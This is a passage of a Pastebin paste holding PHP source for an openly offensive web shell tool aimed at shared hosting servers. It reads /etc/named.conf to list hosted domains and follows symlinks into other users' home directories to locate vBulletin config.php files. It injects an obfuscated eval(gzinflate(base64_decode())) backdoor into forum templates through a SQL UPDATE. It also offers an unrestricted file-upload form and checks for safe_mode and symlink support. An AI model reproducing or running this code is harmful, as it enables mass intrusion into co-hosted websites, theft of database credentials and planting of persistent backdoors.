  1194. $shell = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
  1195.  
  1196. $crypt = "{\${eval(gzinflate(base64_decode(\'";
  1197.  
  1198. $crypt .= "$shell";
  1199.  
  1200. $crypt .= "\')))}}{\${exit()}}</textarea>";
  1201.  
  1202. $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
  1203.  
  1204. $query = @mysql_query($sqlfaq,$con);
  1205.  
  1206.  
  1207.  
  1208. if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
  1209.  
  1210. else
  1211.  
  1212. {
  1213.  
  1214. $r = '<b style="color:red">failed</b>';
  1215.  
  1216. }
  1217.  
  1218. $domins = trim($domin).'';
  1219.  
  1220. echo "<tr>
  1221. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1222. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  1223.  
  1224.  
  1225.  
  1226.  
  1227.  
  1228.  
  1229.  
  1230. }else{
  1231.  
  1232. echo "<tr>
  1233. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1234. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  1235. }
  1236.  
  1237. }
  1238.  
  1239.  
  1240.  
  1241.  
  1242.  
  1243.  
  1244.  
  1245.  
  1246.  
  1247.  
  1248. die();
  1249.  
  1250. }
  1251.  
  1252. if(!is_file('named.txt')){
  1253.  
  1254. $d00m = file("/etc/named.conf");
  1255.  
  1256. }else{
  1257.  
  1258. $d00m = file("named.txt");
  1259.  
  1260.  
  1261. }
  1262. if(!$d00m)
  1263. {
  1264.  
  1265. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1266. }
  1267. else
  1268.  
  1269. {
  1270. echo "<div class='tmp'>
  1271. <form method='POST' action='$pg?sws=vb'>
  1272. <input type='submit' value='Inject shell' />
  1273. <input type='hidden' value='1' name='s' />
  1274. </form>
  1275. <br /><br />
  1276. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1277.  
  1278. $f = fopen('vb.txt','w');
  1279.  
  1280. foreach($d00m as $dom){
  1281.  
  1282. if(eregi("zone",$dom)){
  1283.  
  1284. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1285.  
  1286. if(strlen(trim($domsws[1][0])) > 2){
  1287.  
  1288. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1289.  
  1290. ///////////////////////////////////////////////////////////////////////////////////
  1291.  
  1292. $wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
  1293. $wpp=get_headers($wpl);
  1294. $wp=$wpp[0];
  1295.  
  1296. $wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
  1297. $wpp2=get_headers($wp2);
  1298. $wp12=$wpp2[0];
  1299.  
  1300. $wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
  1301. $wpp3=get_headers($wp3);
  1302. $wp13=$wpp3[0];
  1303.  
  1304.  
  1305. ////////// vb ////////////
  1306.  
  1307. $pos = strpos($wp, "200");
  1308. $config="&nbsp;";
  1309.  
  1310. if (strpos($wp, "200") == true )
  1311. {
  1312. $config= $wpl;
  1313. }
  1314. elseif (strpos($wp12, "200") == true)
  1315. {
  1316. $config= $wp2;
  1317. }
  1318. elseif (strpos($wp13, "200") == true)
  1319. {
  1320. $config= $wp3;
  1321. }
  1322. else
  1323. {
  1324. continue;
  1325.  
  1326. }
  1327. flush();
  1328.  
  1329. /////////////////////////////////////////////////////////////////////////////////////
  1330.  
  1331. $dom = $domsws[1][0];
  1332.  
  1333. $w = fwrite($f,"$config||$dom \n");
  1334. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1335.  
  1336.  
  1337. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1338. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1339.  
  1340.  
  1341.  
  1342.  
  1343.  
  1344. flush();
  1345.  
  1346.  
  1347. }
  1348. }
  1349. }
  1350. }
  1351.  
  1352.  
  1353.  
  1354.  
  1355.  
  1356.  
  1357.  
  1358.  
  1359. break;
  1360.  
  1361. case 'help':
  1362.  
  1363. echo "<div class='tmp'>
  1364. <table align='center' width='40%'><td>function</td><td>Case</td>";
  1365.  
  1366.  
  1367. $safe_mode = ini_get('safe_mode');
  1368. if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1369.  
  1370. echo "<tr><td>Safe Mode</td><td>$r</td>";
  1371.  
  1372. $fun = function_exists('symlink');
  1373. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1374.  
  1375. echo "<tr><td>function symlink</td><td>$r</td>";
  1376.  
  1377.  
  1378. $fun = function_exists('file');
  1379. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1380.  
  1381. echo "<tr><td>function file</td><td>$r</td>";
  1382.  
  1383. $fun = function_exists('file_get_contents');
  1384. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1385.  
  1386. echo "<tr><td>function file_get_contents</td><td>$r</td>";
  1387.  
  1388. $fun = function_exists('mkdir');
  1389. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1390.  
  1391. echo "<tr><td>function mkdir</td><td>$r</td>";
  1392.  
  1393.  
  1394. $fun = is_dir('sym/root');
  1395. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1396.  
  1397. echo "<tr><td>Permission denied</td><td>$r</td>";
  1398.  
  1399.  
  1400. $fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
  1401. if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
  1402.  
  1403. echo "<tr><td>Forbidden</td><td>$r</td>";
  1404.  
  1405.  
  1406.  
  1407.  
  1408. echo "</table></div>";
  1409.  
  1410.  
  1411.  
  1412. break;
  1413. default:
  1414. header("Location: $pg");
  1415.  
  1416.  
  1417.  
  1418.  
  1419. }
  1420.  
  1421.  
  1422. /// home ///
  1423. }else
  1424. {
  1425.  
  1426.  
  1427. echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1428. echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1429. if( $_POST['_upl'] == "Upload" ) {
  1430. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
  1431. else { echo '<br /><br />Not uploaded !!<br><br>'; }
  1432.  
  1433.  
  1434. }
  1435.  
  1436. echo '
  1437. <br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
  1438. <br /><br />
  1439. <b style="color: red";> Sec-w.Com </b>
  1440. <br /><br />
  1441. Muslims Hackers</div> ';
  1442.  
  1443. }
  1444.  
  1445.  
  1446. function ex($text,$a,$b){
  1447. $explode = explode($a,$text);
  1448. $explode = explode($b,$explode[1]);
  1449. return $explode[0];
  1450. }
  1451.  
  1452.  
  1453.  
  1454. echo '</div>
  1455.  
  1456. <a style="text-decoration: none; color: #F4F4F4;" title="???????"/href="http://sec-w.com/cc">???????</a>
  1457.  
  1458. <a style="text-decoration: none; color: #F4F4F4;" title="???? ???????"/href="http://sec-w.com/cc">???? ???????</a>
  1459.  
  1460.  
  1461.  
  1462. </body>
  1463.  
  1464. </html>
  1465. ';
  1466.  
  1467. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!